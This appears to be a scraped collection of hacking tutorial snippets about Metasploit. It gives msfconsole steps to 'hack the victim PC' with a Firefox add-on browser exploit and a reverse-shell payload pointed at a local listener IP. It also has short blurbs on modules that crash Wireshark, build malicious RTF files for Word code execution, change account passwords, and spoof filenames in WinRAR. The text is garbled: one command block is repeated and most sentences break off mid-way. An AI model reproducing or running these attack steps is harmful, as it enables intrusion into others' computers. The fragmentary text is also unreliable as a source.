First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC) Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target
Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf
Open Kali terminal type msfconsole Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host) msf exploit (firefox_xpi_bootstrapped_addon)>set uripath / msf
According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of
This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.) Exploit Targets Wireshark <= 1.8.12/1.10.5 Requirement Attacker: kali Linux
This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in
This module will attempt to change the password of the targeted account. The typical usage is to change a newly created account’s password on a
This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists when opening ZIP files. The file names showed in WinRAR when opening a